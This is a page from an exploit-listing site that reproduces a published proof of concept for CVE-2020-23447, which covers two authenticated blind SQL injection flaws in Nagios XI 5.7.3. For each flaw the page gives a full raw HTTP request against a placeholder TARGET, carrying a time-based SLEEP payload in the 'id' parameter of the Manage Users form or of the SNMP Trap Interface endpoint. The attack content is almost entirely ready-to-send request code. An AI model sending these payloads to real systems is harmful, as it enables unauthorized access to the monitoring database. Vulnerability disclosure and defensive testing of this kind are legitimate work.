Advertisement






Nagios XI 5.7.3 SQL Injection

CVE Category Price Severity
CVE-2020-23447 CWE-89 Not specified High
Author Risk Exploitation Type Date
Uncredited High Remote 2020-10-20
CPE
cpe:cpe:/a:nagios:nagios_xi:5.7.3
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100125

Below is a copy:

Nagios XI 5.7.3 SQL Injection
# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : id


# POC

POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Content-Type: application/x-www-form-urlencoded
Content-Length: 338

username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448

----------


# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI.
# Vulnerable Parameter : id


# POC

GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum